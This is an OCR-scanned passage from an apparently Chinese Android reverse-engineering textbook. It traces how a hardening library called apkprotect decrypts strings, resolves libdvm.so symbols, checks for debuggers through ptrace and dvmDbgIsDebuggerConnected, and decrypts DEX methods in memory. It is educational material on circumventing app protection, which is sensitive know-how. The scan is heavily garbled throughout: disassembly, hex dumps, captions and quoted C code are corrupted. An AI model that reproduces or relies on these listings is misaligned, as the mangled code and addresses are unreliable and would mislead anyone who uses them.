80402EBA LOR — RO, =0x504 
в1, m 


по, wo 
loc 89h02ERO 


80402EC8 BEQ 


图 18-25 sub 804075Е0 的 代码 


调用 sub 804075FO ， 如 果 非 0， 则 直接 调用 dlopen，sub_804075F0 是 字符 串 解 密 函 数 ， 返 回 值 是 解密 
后 字符 串 的 长 度 ， 此 处 被 命名 为 decrypt_string。 根 据 上 下 文 可 以 得 到 解密 函数 的 原型 ， 具 体格 式 如 下 所 示 。 

int decrypt_string(void *decrypt_buffer, int decrypt_buffer_length, 

const void *encrypted string, int encrypted string length); 
(6) 4% F4 键 来 到 dlopen0 函 数 ， 其 原型 如 下 所 示 。 
void *dlopen(const char *filename, int flag); 
查看 R0 指向 的 字符 串 即 可 ， 如 图 18-26 所 示 。 
|BED72754 73 79 73 74 65 6D 2F 6С 69 62 2F 6C 69 62 6h /system/lib/libd 


BED72764 76 6D 2E 73 6F 66 00 00 66 00 vun.so........... 
nrn7977^ AA аа аа аа аа аа аа ва ва аа 


826 ”RO0 指向 的 字符 串 
(7) 开始 分 析 libdvm.so， 它 和 Dalvik 虚拟 机 有 关 。 接 下 来 开始 调用 dlsym 获得 libdvm.so 里 面 符 号 的 


地 址 ， 其 代码 如 图 18-27 和 图 18-28 所 示 。 
© 


UU Android REG Ro RERO 


Оа 
|aorrc ene 
|peueorrr nro 


18-27 libdvm.so 的 代码 


上 面 代码 都 实现 了 对 加 密 字符 串 的 解密 操作 ， 
(8) 函数 dlsym() 的 原型 如 下 所 示 。 
void *dlsym(void *handle, const char *symbol); 
在 调用 dlsym0 〇 时 ， 调 用 的 RI 就 是 符号 名 称 。 
图 18-29 所 示 。 


| SF 58 31 33 64 7 
BED7226% [fi 76 во 00 00 о 


lBED72354 @ 5а 31 38 64 76 6D n6 
в 6^ 6h цз 6C 61 73 73 50 ^B 
„ па an па па na na aa па 


BED72454 5а 31 39 6% 76 60 4E 
BED72464 63 72 69 70 7h 6F 72 50 


BED72454 5а 31 39 6% 76 60 4E 
BEDZ2h6h 63 72 69 70 7h 6F 72 50 
BED7265^ 国 5A 32 35 6h 76 6D h 
BED7266% 67 67 65 72 АЗ OF 6E 6E 


оспоодзь AA па AA па an па na an 


|aevezrsa cne 
|aevezrsa BEQ 


图 18-28 libdvm.so 中 的 代码 部 分 


这 些 字符 串 是 libdvm.so 中 的 符号 。 


根据 前 面 的 函数 dlopenO 可 以 得 到 对 应 的 字符 串 ， 分 别 如 


68 72 65 61 64 5: 
00 00 00 ов 00 ві 


69 GE 64 АС 6F 61 64 65 
оз во 00 00 00 00 00 00 
na па пп пп пп па па an 


61 60 65 54 GF hh 65 73 
ив 63 во 00 00 00 00 00 


62 67 һә 73 hh 65 6; 
65 63 7h 65 64 76 00 00 
AA па па па nn па nn an 


图 18-29 得 到 字符 串 


其 中 ，R5 指向 了 apk_protector runtime 结构 ， 用 于 将 获得 的 符号 地 址 保存 到 这 个 结构 中 。 


(9) 继续 分 析 后 面 的 代码 ， 如 图 18-30 所 示 。 _ 


18-30 ”后 面 的 代码 


Il 
_218dunFindLoade 
dClassPKc....... 


_219dumNaneTobes 
criptorPkc...... 


_219dunNaneTobes 
criptorPKc...... 


_225dunDbgIsDebu 
ggerConnectedv. . 


第 18 章 动态 分 


在 此 将 apk protector runtime 中 刚 保存 的 符号 地 址 和 0 进行 比较 ， 如 果 都 为 0 时 分 析 loc_80402FAC 流 
程 ， 看 在 流程 中 是 否 调用 了 decrypt string 解密 操作 。 对 图 18-31 和 图 18-32 所 示 的 代码 进行 分 析 。 


awe2FCE 
lsowezFce Тос_ваче2ЕС! 
leowezrce ноос RS, RE 
jsouezFoe apps 

іввче2ғог Hous 
aewg2FDs віх 
jsaaezFps Hous 
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Івочегғос ADD 
sawgzFEB MUS x 
seag2FE2 BL decrppt string 

no, ao 


loc BROANFEC 


RO, SP. sexh20vuar_810| 
H2, B6 

decrypt. string 

Ro, #0 


18-31 


; nane 
Ri. SP, SxA20nane 
нв 3 handle 


-(apk_protecter_runtine - 8x80A09058)| 
SP, #йй2б<оаг 01С ; mane 
Pt 


. [Rs ane] 
ле 


/80A89058 HOV ; handle 
(Won 0305n віх a 

‘Rowaaese ADD SP, MMA20+Uar_RIC ; nane 
80409060 STR 


[了 5。SBx13] 
Lj ; handle 


SP, awa?osuar 71C ; name 
ERS, 801C] 
нв 


толөзовс MOU ; handle 
8000306F віх a 
80403072 ADD SP, BOxN20-var 628 


0503078 SIR [85,8029] 
an 


волозоте ADDS ; name 
8009078 Hou Re 2 handle 
ввлвзвта BLX л 

ha307E STR [s.s] 

[OCT 1ос_88аб2Ей@ 


图 18-32 结束 部 分 的 代码 


继续 调用 函数 disym(0)， 通 过 按 РА 键 定位 到 disym 上 ， 然 后 观察 RI 执行 的 字符 串 是 什么 ， 如 图 18-33 
所 示 。 


lBED72254 [f] 76 6D 54 68 72 65 61 би 53 65 6C 66 dunThreadSelf... 
ВЕр72264 d 
|BED72274 
jeEp72284 


18-33 RI 执行 的 字符 串 
(10) РЖ JNL OnLoad0 开 始 返回 结果 ， 如 图 18-34 所 示 。 由 此 可 见 ， 返 回 值 是 0x10004， 即 JNI- 


VERSION 1 4. 
9 


到 此 为 止 ， 函 数 INL OnLoad(0) 的 分 析 工 作 全 部 结束 。 首 先 通过 _system_property_get 获得 系统 版 本 ， 然 
后 将 其 存储 到 全 局 apk_protector_runtime 结构 对 应 的 域 中 。 接 下 来 调用 解密 字符 串 dlopen 或 者 libdvm.so tJ 
Wi, 然后 调用 dlsym() 分 别 通过 dvmThreadSelf、dvmFindLoadedClass、dvmNameToDescriptor、dvmDescriptor- 
ToName 和 dymDbglIsDebuggerConnected 来 初始 化 apk protector runtime， 并 且 在 上 述 过 程 中 对 C 和 C++ 符 
号 实现 了 兼容 性 调整 。 


ILTZZT] 
Baa2Eni 
pwazER 
sewazER2 LOR 
aewazEnn hpp — m3, SP 


авав2ғав LDR — R2. [R3] 
aaWZERS LOR — R3. [RN] 
зззегЕйй CHP 


aawazEnc BEQ 


usa 
m 
80503082 loc 80403082 
80503082 BLY 


Тос_нвнизин2| |нозвгевв 


BewazEpe POP 


stack chk fail 
|eeneses2 ; End of Function JN! OnLoad 
[89403882 


B0802EBO loc_86402E80 


яз, -exñ09 
SP, R3 
(R2) 
RB, R2 
{RA-RZ ,PC) 


1834 JNI OnLoad0 开 始 返回 结果 


18.5.2 分 析 Java com apkprotect Init 


函数 Java com apkprotect Init()/t T1 DEX 中 加 密 的 方法 进行 解密 ， 此 函数 涉及 了 Dalvik 虚拟 机 和 堆 
结构 的 知识 。 


(1) 函数 Java_com_apkprotect_Init() 的 入 口 点 如 图 18-35 所 示 。 


@ 


003368 LSLS 
0002360 OLE 


80103372 CHP 
90402374 BEQ 


18-35 Јауа сот арКргоїесї тї) АП 


在 此 需要 注意 在 图 18-35 中 选中 的 指令 ， 其 中 ，R5 是 apk protector runtime 结构 ， 而 0x24 偏 移 是 
had decrypt methods， 如 果 和 1 相等 则 跳 转 到 loc. 804033B8. 


жолезз3л usr 230: -e230 
80483334 s- 02190 


pe 
на, [ка] 
RB, SP, fax250+s ; s 


RS, -(apk protector runtine - 


яз, [ка] 
w" 


ns, РС 
R3, [SP,B0x250rvar_ 20] 
menset 


на, SP, Boxzsaruar 228 ; € 
я2, R2, 1 


R3, п 
loc 80452988 


RA, -( stack chk guard ptr - оха 0403252) 
R2, ®1 


60403956) 


(2) 如 图 18-36 所 示 的 代码 是 函数 Init0 的 返回 。 


CF 


180403750 
80403750 loc 80103750 
90409750 BLX stack chk fail 


图 18-36 ”函数 Init0 的 返回 


由 此 可 见 ，apkprotect 一 次 性 把 所 有 方法 进行 了 解密 。 
(3) 继续 分 析 后 面 的 代码 ， 如 图 18-37 所 示 。 


jsuswsszz Um — aes, n 
Rm 237^ REN loc RüAG33PR. 


wee 
80103376 LOR 
80103378 муз 
0163370 CHP 


80403370 BEQ 


BUAVSJ7E LOR 
80102380 CHP 
(80403282 BEQ 


R3, [RS.W0x1C]| 
вз, mo 


(80403388 BEY —  1oc 8056033885 


R3. [RS.80:26] 
Ra, so 


loc 80103388 


图 18-37 后 面 的 代码 


在 上 述 代码 中 ，R5 指向 了 apk_protector_runtime 全 局 结构 , 通过 上 述 代 码 确 认 在 INI_OnLoad 中 获得 符 


号 有 效 性 。 
(4) 80403392 BL 和 函数 sub 80402BF00 对 应 ， 如 图 18-38 所 示 。 


此 时 可 以 调用 函数 ptrace0) 进 行 反 调试 操作 ， 函 数 ptrace0) 的 原型 如 下 所 示 。 


int ptrace(int request, int pid, int addr, int data); 
函数 ptrace0 对 应 的 参数 如 图 18-39 所 示 。 
通过 查看 Android 源码 会 看 到 下 面 的 内 容 。 
#define PTRACE_TRACEME 0 


EEUU jud Rete Raza 


|BO32BFO var _12н- -0x123 
jaBaa2BFB var 2h- -ax28 
seaazBFe 


lsosazore PUSH — (R^-RZ,LR) 
jsBwBaBF2 Nov — R7, RO 
jsBaa2BFa Mou 


(stack chk guard ptr - ex8o4e2c0a) 
š request 


Ro, no 
[89482616 BLI lnc_SBaa2Can 


wae 
8040218 LOR k protector runtime - 0x80%02C1E) 
80402C1n ADD 

в0102С1С LOR au] 

ВШАШ2СТЕ СИР ЕЗ. Hy 

80302020 BEQ 10с В0%02С50 


图 18-38 ”函数 sub_80402BF0() 


图 18-39 ”函数 ptrace() 对 应 的 参数 


由 此 可 见 ， 函 数 ptrace0 对 应 的 代码 如 下 所 示 。 
int flag = ptrace(PTRACE_TRACEME, 0, 0,0); 
当 flag 值 为 -1 时 ， 表 示 so 被 调试 。 当 调用 ptrace 的 工作 完成 后 ， 该 r0 为 0。 有 具体 流程 如 图 18-40 所 示 。 


нз, [85.05] 
яз, ва 
loc 60402056. 


acu 

[ZZ] 

jsenezcs6 10с_ взав2с56 

(80902256 LOR 12, -(encrupted strings - 0х00402С60) 
R2, wo 


Іввавәс6с 1505 wil RI, mi 
jsewazc6E ADD кё, SP, W0x228*uar 224 
(ввив2с7в HOUS — R2, R6 

(898272 BL ^ — decrypt string 
Wmwpczó CH Ro, no 
|ponn2czs BEQ 


loc 80490202A 


图 18-40 ”调用 流程 图 


图 18-40 'BñJ[R5, #4]30J#ë apk protector runtime 中 的 pfn dvmDbgIsDebuggerConnected， 通 过 查看 
Android 源码 可 看 到 如 下 代码 。 

[2 

* Returns "true" if a debugger is connected. 


* 


* Does not return "true" if it's just a DDM server 
ч 


e 


яве юбяшювн — 


bool dvmDbglsDebuggerConnected(void) 
{ 
return gDvm.debuggerActive; 
} 
通过 上 面 的 注释 可 知 , 如 果 存 在 Java 层 调试 器 , 则 会 返还 true, 此 处 把 RO 改 成 0 就 会 返回 后 面 的 函数 。 
具体 调用 过 程 如 图 18-41 所 示 。 
而 图 18-42 的 分 支 是 在 当 pfn_dvmDbglsDebuggerConnected 为 0 时 调用 。 


a d 
80502C56 

80462656 10с_ 8040256 

80402056 LDR R2, -(encrypted strings - 0х80402С60) 
88482C58 HOUS — R7, #9 

80&2CSR MOU — RO, R2 

B8482C5C ADD — R9, РС 

80402С5Е MOU ВБ, R9 

80482660 ADDS Ró, #4 


jum |ы= а 80402C62 MOUS RO, Ró ;5 
88482CA6 MOU 86462064 BLX strlen 

80462624 СМР RO, #0 88482CA8 LOR 80402C68 MOUS R1, 80х80 

86402026 BNE loc_86462C42| 8O482CAA LOR 86402C6A MOUS R3, RO 
80502C0C MOUS 80%@2С6С LSLS R1, R1, "7 
80502CñE LOR 80402C6E ADD RO, SP, 0x228«var 224 
80502CB0 ADD 80402С70 MOUS R2, R6 
80492CB2 MOUS 80402072 BL decrypt_string 
80402CB4 ADD 80482076 СМР RO, "o 

| 80402086 HOU 80402078 BEQ loc 80402t20 
图 18-41 调用 过 程 1842 4pfn dvmDbglIsDebuggerConnected 为 0 时 调用 


在 上 述 调用 流程 中 , 通过 使 用 JNIEnv *env 来 调用 类 android/os/Debug 中 的 函数 isDebuggerConnected(), 
以 实现 检测 调试 器 的 目的。 函数 isDebuggerConnected() 的 具体 代码 如 下 所 示 。 
p 
* Determine if a debugger is currently attached 
Т 
public static boolean isDebuggerConnected(){ 
return VMDebug.isDebuggerConnected(); 
) 
(5) 跳出 函数 isDebuggerConnected()， 开 始 分 析 后 面 的 流程 ， 如 图 18-43 所 示 。 


+ 


|agw93398 LOR кб, =(aNdixnsixjscunn - Ux89AE33AU) 
|B040939C ADD Ró, PC 5 "PDIXnSUsJsCUMYe e 
[9050339 ADDS пв, Wox3C 

8040330 HOUS RO, RS 3s 


lauaaaa2 ВХ strlen 
5003306 MOUS кт, NOxBD 

8003308 MOUS ЕЗ, RO 

|воһоззва LSLS — Ri, Ri, #1 

|воноззас пор Re, SP, #0x250evar 230 
jsBusa3nE MOUS — R2, Rñ 

(30403380 BL Gecrypt string 
івоһоззва СНР R0, No 

[0409306 ВНЕ loc 80583206 


|в0ь02206 

189192206 loc 83102306 

Іввивззре LDR F3, [RS ахл] 
|воһозарв ADD R0, SP, #9x250+var 220] 
івоһоззра вх ка 

|ввһвзэрс sUDS ре, RO, #9 
|80һ0320Е BEQ ос 80182208 


|воноззєе LOR Ra, (RS, 018] 
|вашзззЕ2 HOUS ве, RS 
sensasEs BLX кз 

jsenessE6 MOUS — FS, RO 
|воһоззєв HOUS пе, RG 


jaenBasEn ВХ free 
aauBasEE сир R5, ns 
|Bogg3Fe BEQ — — loc SSAsi3ES 


18-43 ”后 面 的 流程 
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上 述 流程 调用 函数 pfn_dvmNameToDescriptor() 解 密 了 一 个 字符 串 , 其 中 , R5 就 是 apk protector runtime 


全 局 结构 。 函 数 dvmNameToDescriptor0 的 具体 代码 如 下 所 示 。 
E 
* Return a newly-allocated string for the type descriptor for the given 
* internal-form class name. That is, a non-array class name will get 
* surrounded by "L" and ";", while array names are left as-is 
"7 
char* dvmNameToDescriptor(const char str) 


if (str[0] = T) ( 
size_tlength = strlen(str); 
char* descriptor = malloc(length + 3); 
if (descriptor == NULL) ( 
return NULL; 


} 

descriptor[0] = 'L'; 
strcpy(descriptor + 1, str); 
descriptor[length + 1] 
descriptor[length + 2] = '\0'; 
return descriptor; 


return strdup(str); 
) 
通过 按 F4 键 来 到 “804033DA BLX R3" , RO 指向 是 一 个 解密 的 字符 串 ， 如 图 18-44 所 示 。 
HULD/vDUN ыт BZ UU AU B8 LU UT SU зи CD UT зи 64 ZD D/ BE .. .WTH Fit 


ВЕр720С8 6F 6D 2F 61 70 6B 70 72 6F 7^ 65 63 7^ 00 00 con/apkprotect.. 
ВЕ в 00 00 66 00 66 00 00 66 00 00 00 08 ................ 


FA 18-44 来 到 804033DA BLX R3 


(6) 开始 调用 free 释放 操作 ，“804033E4 BLX R3” 调 用 了 函数 dvmFindLoadedClass()， 对 应 代码 如 
下 所 示 。 

proto: 

ClassObject* dvmFindLoadedClass(const char* descriptor); 

其 中 ，descriptor 就 是 dvmNameToDescriptor 的 返回 值 。dvmFindLoadedClass() 返 回 一 个 com/apkprotect 
类 的 对 象 指针 ， 其 中 ，apkprotect 是 在 加 固 时 洪 加 进去 的 。 为 了 分 析 获 得 一 个 ClassObject 的 目的 ， 先 来 看 结 
构 ClassObject 的 具体 定义 代码 。 

struct ClassObject { 

Object obj; /* MUST be first item */ 


/* leave space for instance data; we could access fields directly if we 
freeze the definition of java/lang/Class */ 
u4 instanceData[CLASS FIELD SLOTS]; 


/* UTF-8 descriptor for the class; from constant pool, or on heap 
if generated ("[C") */ 

const char*descriptor; 

char*descriptorAlloc; 


/* access flags; low 16 bits are defined by VM spec */ 
u4 accessFlags; 


/* VM-unique class serial number, nonzero, set very early */ 
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u4 serialNumber; 


/* DexFile from which we came; needed to resolve constant pool entries */ 
/* (will be NULL for VM-generated, e.g. arrays and primitive classes) */ 
DvmDex* pDvmDex; 


/* state of class initialization */ 
ClassStatus status; 


F if class verify fails, we must return same error on subsequent tries */ 
ClassObject*verifyErrorClass; 


/* threadid, used to check for recursive <clinit> invocation */ 
u4 initThreadld; 


r 
* Total object size; used when allocating storage on gc heap. (For 
* interfaces and abstract classes this will be zero.) 

7 
size tobjectSize; 


/* arrays only: class object for base element, for instanceof/checkcast 
(for String[ Jf ][ ], this will be String) */ 
ClassObject*elementClass; 


/* arrays only: number of dimensions, e.g. int[ ][ ] is 2 */ 
int arrayDim; 


/* primitive type index, or PRIM NOT (-1); set for generated prim classes */ 
PrimitiveType ^ primitiveType; 


/* superclass, or NULL if this is java.lang.Object */ 
ClassObject*super; 


/* defining class loader, or NULL for the "bootstrap" system loader */ 
Object* classLoader; 


/* initiating class loader list */ 

/* NOTE: for classes with low serialNumber, these are unused, and the 
values are kept in a table in gDvm */ 

InitiatingLoaderList initiatingLoaderList; 


/* array of interfaces this class implements directly */ 
int interfaceCount; 
ClassObject interfaces; 


/* static, private, and «init» methods */ 
int directMethodCount; 
Method* directMethods; 


/* virtual methods defined in this class; invoked through vtable */ 
int virtualMethodCount; 
Method* virtualMethods; 


537 
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r 
* Virtual method table (vtable), for use by "invoke-virtual". The 
* vtable from the superclass is copied in, and virtual methods from 
* our class either replace those from the super or are appended 
gi 

int vtableCount; 

Method** vtable; 


r 
* Interface table (iftable), one entry per interface supported by 
*thisclass. That means one entry for each interface we support 
* directly, indirectly via superclass, or indirectly via 
* superinterface. This will be null if neither we nor our superclass 
* implement any interfaces. 


* Why we need this: given "class Foo implements Face", declare 
* "Face faceObj = new Foo()". Invoke faceObj.blah(), where "blah" is 
* part of the Face interface. We can't easily use a single vtable 


* For every interface a concrete class implements, we create a list of 
* virtualMethod indices for the methods in the interface 
7 

int iftableCount; 

InterfaceEntry* iftable; 


F 
* The interface vtable indices for iftable get stored here. By placing 
* them all in a single pool for each class that implements interfaces, 
* we decrease the number of allocations 
у 

int ifviPoolCount; 

int* ifviPool; 


/* instance fields 
* These describe the layout of the contents of a DataObject-compatible 
* Object. Note that only the fields directly defined by this class 
* are listed in ifields; fields defined by a superclass are listed 
* in the superclass's ClassObject.ifields. 


* All instance fields that refer to objects are guaranteed to be 
* at the beginning of the field list. ifieldRefCount specifies 
* the number of reference fields 
"i 
int ifieldCount; 
int ifieldRefCount; // number of fields that are object refs 
InstField* ifields; 


/* bitmap of offsets of ifields */ 
u4 refOffsets; 


/* source file name, if known */ 
const char* sourceFile; 


f* static fields */ 
int sfieldCount; 
StaticField sfields[ ]; /* MUST be last item */ 
y 
其 中 ， 结 构 DvmDex*pDvmDex 和 Dex HIRE EHX. 
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(7) 继续 分 析 下 面 的 代码 ， 重 点 分 析 函 数 sub. 80402D600， 如 图 18-45 所 示 。 


R2. -(apk protector runtime - 0х80403416) 
R7, R11 

m2, Pe 

яз, [R2,80x0] 
яз, #1 
1ос_волизллЕ 


图 18-45 sub_80402D600 函 数 


5056351 BNE 


вөчәззк2 nou 
|B0s033F^ nous 
|g0032F0 LDR 
lsonos2Fc LDR 
[B64833FE LOR 
івочозаоо ноо 
|80403502 СНР 
[8040305 BHE 103408 
|воъозаве Б — I 
Ж 
um EE 
9083508 [8003520 
[80103108 loc ввлозпов 8003520 loc 88193524 
впаозавв LOR — R2, [RU,fU»[] [80403528 LOR 2, [нб,шз] 
воаозава LOR вз, [R0,88] [80403526 108 Вз, [RZ, 0x20) 
B080350C ADDS вз, R2, R3 (8090352 HOU — mil, R2 
BeweaneE STR — Ва, [SP,#0x25G-var 240]| 8002528 STR — R2, [SP, #0x250ruar 28] 
[80403532 B loc 80103418 


Hp, ROJÉ JNIEnv *env, RI 是 com/apkprotect 的 ClassObject 指针 ， 如 图 18-46 所 示 。 


RO 00000BEO « [heop]:000DRBEG 
R1 40590088 w dalvik_heap_(deleted):4059D0B8 


图 18-46 RO 和 RI 
按 F7 键 进入 如 图 18-47 所 示 的 流程 。 


80402068 sub_80402060 

4R3-R7,LR) 

R3, -(apk protector runtime ~ 9x80402D6C) 
"i 


[8092070 LOR 
(89102072 LOR 
88182074 LOR 
(9102076 LOR 
88102078 CHP 
83910207A BEQ 


R 
loc 8Ohg2t4n 


86xg2D7C LOR — R2, гна, аз] — | sunu2t48 
80492D7E LOR — R3, 0x28]| влегла loc возвгета 


engzE16 LOK 
(в вме2Е1С nous 
BONEZETE BL 
[8052622 В 


Baezpse MOUS вл, 
80402082 ADDS RZ, R2, R3 
вваворв BL sub $0A02028 


R2, [R6,g0x20] 
RA, R6 

sub 86102020 
loc 86402088 


18-47 W DvmDex memMap to ClassObject delta 
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此 时 开始 设置 apk protector runtime 中 的 DvmDex_memMap_to_ClassObject_delta 为 0。R1 是 ClassObject*, 
0x28 是 ClassObject 的 pDvmDex， 则 通过 如 下 过 程 可 以 得 出 obj 的 大 小 是 8。 
typedef unsigned int u4; 
#define CLASS FIELD SLOTS 4 
5) 
typedef struct Object { 
/* ptr to class object */ 
ClassObject* clazz; 


r 
* A word containing either a "thin" lock or a "fat" monitor. See 
* the comments in Sync.c for a description of its layout. 
7 
u4 lock; 
) Object; 


struct ClassObject ( 
Object obj; /* MUST be first item */ 


/* leave space for instance data; we could access fields directly if we 
freeze the definition of java/lang/Class */ 
u4 instanceData[CLASS FIELD SLOTS]; 


/* UTF-8 descriptor for the class; from constant pool, or on heap 
if generated ("[C") */ 

const char* descriptor; 

char* descriptorAlloc; 


/* access flags; low 16 bits are defined by VM spec */ 
u4 accessFlags; 


/* VM-unique class serial number, nonzero, set very early */ 
u4 serialNumber; 


/* DexFile from which we came; needed to resolve constant pool entries */ 
/* (will be NULL for VM-generated, e.g. arrays and primitive classes) */ 
DvmDex* pDvmDex; 


} 
具体 计算 过 程 如 下 所 示 。 
8+CLASS_FIELD_SLOTS*4+4+4+4+4=0x28 
各 个 相关 结构 的 具体 实现 代码 如 下 所 示 。 
typedef struct DvmDex ( 
/* pointer to the DexFile we're associated with */ 
DexFile* pDexFile; 


/* clone of pDexFile->pHeader (it's used frequently enough) */ 
const DexHeader* pHeader; 


/* interned strings; parallel to "stringlds" */ 


@ 


аве авәжюаа 


struct StringObject** pResStrings; 


/* resolved classes; parallel to "typelds" */ 
struct ClassObject** pResClasses; 


/* resolved methods; parallel to "methodlds" */ 
struct Method** pResMethods; 


/* resolved instance fields; parallel to "fieldids" */ 
/* (this holds both InstField and StaticField) */ 
struct Field** pResFields; 


/* interface method lookup cache */ 
struct AtomicCache* pInterfaceCache; 


/* shared memory region with file contents */ 
MemMapping memMap; 


/* lock ensuring mutual exclusion during updates */ 
pthread mutex t modLock; 
) DvmDex; 
typedef struct DexFile ( 
/* directly-mapped "opt" header */ 
const DexOptHeader* pOptHeader; 


/* pointers to directly-mapped structs and arrays in base DEX */ 
const DexHeader* pHeader; 

const DexStringld* pStringlds; 

const DexTypeld* pTypelds; 

const DexFieldld* pFieldlds; 

const DexMethodld* pMethodlds; 

const DexProtold* pProtolds; 

const DexClassDef* pClassDefs; 

const DexLink* pLinkData; 


n 
* These are mapped out of the "auxillary" section, and may not be 
* included in the file 


*/ 
const DexClassLookup* pClassLookup; 
const void* pRegisterMapPool; // RegisterMapClassPool 


/* points to start of DEX file data */ 
const u1* baseAddr; 


/* track memory overhead for auxillary structures */ 
int overhead; 


/* additional app-specific data structures associated with the DEX */ 
lvoid* auxData; 
) DexFile; 
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enum { kSHA1DigestLen = 20, 


kSHA1DigestOutputLen = kSHA1DigestLen*2 +1 }; 


typedef struct DexHeader { 
u1 magic[8]; 
checksum; 
signature[KSHA 1DigestLen]; 
fileSize; 
headerSize; 
endianTag; 
linkSize; 
linkOff; 
mapOff; 
stringldsSize; 
stringldsOff; 
typeldsSize; 
typeldsOff; 
protoldsSize; 
protoldsOff; 
fieldldsSize; 
fieldidsOff; 
methodldsSize; 
methodldsOff; 
classDefsSize; 
classDefsOff; 
dataSize; 
dataOff; 
) DexHeader; 
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typedef struct DexOptHeader ( 
u1 magic[8]; 


dexOffset; 
dexLength; 
depsOffset; 
depsLength; 
optOffset; 
optLength; 


flags; 
checksum; 


EE SEREEEE 


} DexOptHeader; 


text:80402D70 LDR RO, [R1,40x28] 
text:80402D72 LDR ВЗ, [RO] 
text:80402D74 LDR R4, [R3] 
text:80402D76 LDR R6, [R3,#4] 
text:80402D78 CMP R4, #0 
text:80402D7A BEQ loc_804 


在 RDA pro 中 的 对 应 流程 如 图 18-48 所 示 。 


人 的 


/* includes version number */ 

/* adler32 checksum */ 

/* SHA-1 hash */ 

/* length of entire file */ 

/* offset to start of next section */ 


/* includes version number */ 

/* file offset of DEX header */ 

/* offset of optimized DEX dependency table */ 
/ file offset of optimized data tables */ 

/* some info flags */ 

/* adler32 checksum covering deps/opt */ 

/* pad for 64-bit alignment if necessary */ 

* RO 是 DvmDex */ 

I* R3 就 是 DexFile */ 

/* R4 DexOptHeader */ 


/* R6 DexFile 的 DexHeader */ 
广 比较 odex header 是 否 为 空 */ 


uae 
80502D7C LOR R2, [Ra,W5] 
80402D7E LDR R3, [R6,80x20] 
80402089 HOUS R1, Rh 
80502082 ADDS R2, R2, R3 
80402084 BL Sub 80402020 


80482E1A LOR R2, [R6,80x20] 
80402E1C MOUS — R1, R 
80402E1E BL sub 80402028 
loc 89482088 


80402088 
80402088 loc 86502088 

80402088 CHP RO, #0 
(80402080 BEQ 


locret 80h02DE6 


图 18-48 ”运行 流程 图 


(8) 因为 Android 默认 安装 的 APP 是 以 优化 的 Odex 来 运行 的 ， 所 以 DexOptHeader* 不 为 室 。 开 始 分 
析 “80402D7C LDR R2, [R4,#8]” 这 一 运行 流程 。Odex 的 格式 如 图 18-49 所 示 。 


DexOptHeader 
DEX (优化 过 的 ， 取 决 于 gvm DexOptMode) 
依赖 库 ， 对 应 库 SHA1 签名 class cre modwhen, length 
附加 数据 ， 如 ClassLookup tables、RegMap tables... 


图 18-49 Odex 的 格式 


函数 sub_80402D20() 的 原型 如 下 所 示 。 
void *sub_80402D20 (DvmDex * pDvmDex , DexOptHeader* (DexHeader*) pheader, dexLength+(odex 


header length)); 
通过 DvmDex 中 的 如 下 暴力 搜索 函数 MemMapping() 进 行 检索 。 
typedef struct MemMapping { 
void* addr; /* start of data */ 
size tlength; /* length of data */ 
void* baseAddr; /* page-aligned base address */ 
size t baseLength; /* length of mapping */ 
) MemMapping; 
上 述 搜索 的 原理 如 下 。 


(pheader==addr&&dexLength<=length 

&&MemMapping.addr==MemMapping.baseAddr 

&&MemMapping.length==MemMapping.baseLength) 

MemMapping 在 DvmDexFileOpenFromFd 进行 赋值 ， 即 Odex 的 ттар 基 址 和 对 应 大 小 。sysMapFileIn- 
ShmemWritableReadOnly() 的 代码 如 下 所 示 。 

int sysMapFilelnShmemWritableReadOnly(int fd, MemMapping* pMap) 

{ 


pMap->baseAddr = pMap->addr = memPtr; 
pMap->baseLength = pMap->length = length; 
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此 时 RO 就 是 DvmDex 的 MemMapping memMap， 如 图 18-50 所 示 。 


mu 
jsenazpgs loc #002088 
Івван208в CMP RA, se 
(в0ч0208а BEQ 


[sua2Don CMP Ru, BO 
[80492096 BEQ 


wezoge ton R1, Ганс) sewezEaw 
ong2D9n LOR Ras (Ras) | HANDED loc явар? 
S0302D9C mous Ro, яа (e402E24 LDR™ R1，rae ,aexzal 
евив209г ADDS ви; RI, na | бё D 102 овһбооав 
|ававо26 ; Ena of Function sub_sehezoal 
[80402E26 


18-50 RO 就 是 DvmDex 的 MemMapping memMap 


然后 用 RO 的 地 址 减 去 RS, RS 是 函数 memMap0 的 第 二 个 参数 ， 接 下 来 将 OdexHeader(DexHeader*) 
address 赋值 给 apk_protector_runtime 中 的 DvmDex_memMap_to_Odex_delta. 
(9) 进入 图 18-51 所 示 的 流程 。 


RO, [R0,88] 
ко, з 


nprotect 


з, 91 
Jocret 有 Bag2DE6 


‚ "Capk protector runtime - вен вакта) 
т 


Bue2E18 HOUS 
Bug2E12 RD 
(00402E14 STRB 


Pe, 
1 pha. oc] 
1 [amoo] 
стеб Bon02DC6 


PERERA 


locret_g m02DE6 
POP {R49-R7.PC)| 


图 18-51 ”比较 流程 
上 述 过 程 用 于 比较 是 Odex 还 是 DEX， 实 现 原 理 是 通过 下 面 的 代码 进行 比较 。 


/* DEX file magic number */ 

#define DEX MAGIC "dex\n" 

/* version, encoded in 4 bytes of ASCII */ 
#define DEX MAGIC VERS "03510" 


/* same, but for optimized DEX header */ 
#define DEX OPT MAGIC "dey\n" 
#define DEX ОРТ MAGIC VERS "03610" 


#define DEX DEP. MAGIC "deps" 
然后 调用 下 面 的 代码 。 

#define PROT_READ 0х1 

#define PROT_WRITE 0x2 

通过 mprotect((o)dex mapped addr, dex length, 3) 来 修改 内 存 为 可 写 状态 , 如 果 mprotect 返回 0 则 表示 成 


e 


MIN C — 


功 。 然 后 会 把 下 面 的 代码 返 
bool mprotect flag; 


回 到 函数 apk protector runtime()- 
ll 0xc 


bool cacheflush flag; 1 Оха & true 
(10) 返回 到 函数 mit) 中 ， 如 图 18-52 所 示 。 


R1, RS 
SuD 80902060 
RS. 


Ré, [R3] 
me, [n5] 
R11, RO 

Ro, no 

loc 88483408. 


loc 8948352n| 


x 
TE PETI 
lssnanen ‘aawna52n 
(80403408 loc 80102108 80402528 1oc_8646252A 
[80403408 LDR — R2, [RO,#0xC] 80403528 LDR R2, [R6,83] 
Bewe3nen LOR — нз, [R0,88] 80402526 LDR НЗ, [R2,#0x20] 
BO^6248C ADDS — F3, R2, R3 j8Bae352E МОШ 11, R2 
BO&0340E STR ЕЗ, [SP,W0x250+uar 258] |80403530 STR — НЗ, [SP,Wox250+uar 248] 
(89403532 В loc_8B483819 


1-37] 
8863819 

80403410 loc_sgng3n19 

B80403410 LOR R2, -(apk protector runtime - 0x80403418)| 
80409412 нои 2, RIT 

esean1a ар m2, РС 

aewean16 Lore — R3, [R2,Ut«C] 

Roag CHP вз, Mi 

AAAINA BNE —— 1oc_AO4EINIE 


